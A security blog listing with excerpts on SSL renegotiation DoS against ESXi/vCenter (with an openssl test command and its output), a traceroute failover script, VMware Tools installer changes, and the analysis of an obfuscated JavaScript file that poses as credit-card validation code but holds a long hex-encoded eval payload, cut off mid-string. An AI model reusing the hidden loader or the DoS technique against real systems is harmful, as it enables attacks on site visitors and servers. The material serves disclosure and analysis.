THC SSL Renegotiation DoS Tool for ESXi authd (port 902)

Posted on by

I had written about the Client-initiated SSL renegotiation DoS tool by THC and how to exploit SMTP STARTTLS mail servers with some modifications some time ago. At the time I’ve also noticed that to my surprise, Client-initiated SSL renegotiation is enabled by default on various vSphere/ESXi components and can be exploited with the THC Tool.

# openssl s_client -connect myesxi.local:443 -state -quiet -no_ign_eof <<< 'R' 
SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:SSLv3 read server hello A
verify error:num=19:self signed certificate in certificate chain
verify return:0
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL_connect:SSLv3 read finished A
RENEGOTIATING
SSL_connect:SSL renegotiate ciphers
SSL_connect:SSLv3 write client hello A
SSL_connect:SSLv3 read server hello A
verify error:num=19:self signed certificate in certificate chain
verify return:0
SSL_connect:SSLv3 read server certificate A
SSL_connect:SSLv3 read server done A
SSL_connect:SSLv3 write client key exchange A
SSL_connect:SSLv3 write change cipher spec A
SSL_connect:SSLv3 write finished A
SSL_connect:SSLv3 flush data
SSL_connect:SSLv3 read finished A
DONE

The CIM-SSL port 5989 for hardware status monitoring is is also renegotiating. This affects all currently known versions of ESXi, including the most latest 6.0 U2 and 5.5 U3releases. vCenter on at least ports 443, 7444, 9443 is also affected.

Continue reading

[Script] Network routing/failover topology change detection

Posted on by

A while ago I wrote a simple but useful script which I’m sharing here to detect upstream provider HSRP failover events via traceroute. It can be used for all kinds of virtual IP routing failover like VRRP, Check Point Cluster XL, actual routing protocols like BGP/OSPF or similar technologies where IP packets can be routed across multiple hops.
The script executes traceroutes to a given destination and checks whether the path is being routed over a certain hop, with the ability to send mail notifications if this is not the case.

You can get the most recent version of this script on my Github here. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment or an issue or a pull-request on Github.

Continue reading

Renamed VMware Tools components and automatic installation

Posted on by

With the release of vSphere 6.0 and a recent update for the 5.5 VMware Tools on May 8th 2015 (9.4.12 build 2627939), VMware also changed the Windows VMware Tools installer slightly by renaming some vShield-related components:
VMware ESXi 5.5, Patch ESXi550-201505402-BG: Updates tools-light

The vShield Endpoint drivers are renamed as Guest Introspection Drivers and two of these drivers, NSX File Introspection Driver (vsepflt.sys) and NSX Network Introspection Driver (vnetflt.sys), can be installed separately now. This allows you to install the file driver without installing the network driver.

If you’ve been using custom automated installations of the VMware Tools like me then you might have to adjust the installer command for newer tools versions.

Continue reading

Decoding and analyzing obfuscated JavaScript for fun and profit

Posted on by

Take a short peek at the following JavaScript file (“ccard.js”):

// Credit Card Validation Javascript
// copyright 12th May 2003, by Stephen Chapman, Felgall Pty Ltd
t="\x31\x30\x31\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x34\x30\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x31\x32\x2c\x34\x34\x2c\x39\x37\x2c\x34\x34\x2c\x39\x39\x2c\x34\x34\x2c\x31\x30\x37\x2c\x34\x34\x2c\x31\x30\x31\x2c\x34\x34\x2c\x31\x30\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x30\x2c\x39\x37\x2c\x36\x33\x2c\x33\x34\x2c\x33\x34\x2c\x35\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x34\x30\x2c\x39\x39\x2c\x34\x37\x2c\x39\x37\x2c\x34\x31\x2c\x34\x31\x2c\x34\x31\x2c\x34\x33\x2c\x34\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x31\x2c\x39\x39\x2c\x33\x37\x2c\x39\x37\x2c\x34\x31\x2c\x36\x32\x2c\x35\x31\x2c\x35\x33\x2c\x36\x33\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x36\x2c\x31\x30\x32\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x36\x37\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x33\x2c\x35\x30\x2c\x35\x37\x2c\x34\x31\x2c\x35\x38\x2c\x39\x39\x2c\x34\x36\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x30\x2c\x35\x31\x2c\x35\x34\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x33\x33\x2c\x33\x39\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x34\x37\x2c\x39\x34\x2c\x34\x37\x2c\x34\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x39\x33\x2c\x36\x31\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x35\x39\x2c\x31\x30\x37\x2c\x36\x31\x2c\x39\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x39\x33\x2c\x35\x39\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x31\x31\x39\x2c\x34\x33\x2c\x33\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x39\x39\x2c\x36\x31\x2c\x34\x39\x2c\x35\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x31\x31\x32\x2c\x36\x31\x2c\x31\x31\x32\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x33\x32\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x34\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x33\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x34\x2c\x33\x39\x2c\x31\x30\x33\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x31\x32\x2c\x35\x39\x2c\x31\x32\x35\x2c\x34\x30\x2c\x33\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x39\x2c\x34\x30\x2c\x39\x37\x2c\x34\x34\x2c\x39\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x36\x31\x2c\x39\x37\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x37\x2c\x36\x31\x2c\x38\x34\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x37\x2c\x36\x31\x2c\x39\x38\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x38\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x33\x2c\x36\x31\x2c\x38\x38\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x37\x2c\x36\x32\x2c\x36\x31\x2c\x38\x33\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x37\x38\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x30\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x32\x2c\x34\x30\x2c\x37\x39\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x37\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x32\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x39\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x31\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x34\x38\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x32\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x39\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x38\x2c\x36\x31\x2c\x34\x30\x2c\x34\x30\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x38\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x38\x39\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x31\x2c\x34\x31\x2c\x34\x35\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x34\x39\x2c\x34\x38\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x36\x39\x2c\x34\x31\x2c\x34\x31\x2c\x34\x37\x2c\x34\x39\x2c\x35\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x39\x38\x2c\x34\x30\x2c\x36\x38\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x38\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x37\x35\x2c\x36\x31\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x36\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x34\x30\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x37\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x39\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x37\x35\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x32\x30\x2c\x36\x31\x2c\x37\x36\x2c\x34\x30\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x34\x2c\x39\x32\x2c\x33\x39\x2c\x34\x39\x2c\x39\x39\x2c\x34\x35\x2c\x35\x34\x2c\x34\x35\x2c\x35\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x32\x2c\x35\x33\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x36\x30\x2c\x36\x31\x2c\x37\x32\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x31\x32\x30\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x37\x32\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x30\x39\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x34\x2c\x37\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x35\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x35\x35\x2c\x34\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x35\x33\x2c\x34\x32\x2c\x34\x39\x2c\x36\x35\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x34\x39\x2c\x31\x32\x32\x2c\x34\x31\x2c\x35\x39\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x36\x31\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x34\x39\x2c\x36\x37\x2c\x34\x30\x2c\x37\x31\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x35\x39\x2c\x34\x39\x2c\x36\x36\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x39\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x38\x31\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x34\x34\x2c\x37\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x34\x39\x2c\x31\x31\x38\x2c\x34\x30\x2c\x33\x34\x2c\x34\x30\x2c\x39\x34\x2c\x31\x32\x34\x2c\x33\x32\x2c\x34\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x34\x30\x2c\x39\x31\x2c\x39\x34\x2c\x35\x39\x2c\x39\x33\x2c\x34\x32\x2c\x34\x31\x2c\x34\x30\x2c\x35\x39\x2c\x31\x32\x34\x2c\x33\x36\x2c\x34\x31\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x32\x31\x2c\x34\x30\x2c\x37\x34\x2c\x34\x31\x2c\x34\x31\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x32\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x37\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x35\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x31\x30\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x39\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x31\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x30\x2c\x36\x31\x2c\x34\x30\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x36\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x35\x2c\x34\x31\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x34\x39\x2c\x35\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x39\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x39\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x31\x32\x2c\x36\x31\x2c\x36\x31\x2c\x34\x39\x2c\x33\x38\x2c\x33\x38\x2c\x38\x31\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x31\x2c\x33\x33\x2c\x36\x31\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x30\x2c\x36\x31\x2c\x34\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x34\x39\x2c\x31\x30\x34\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x30\x2c\x36\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x36\x2c\x36\x31\x2c\x39\x31\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x33\x2c\x35\x38\x2c\x34\x37\x2c\x34\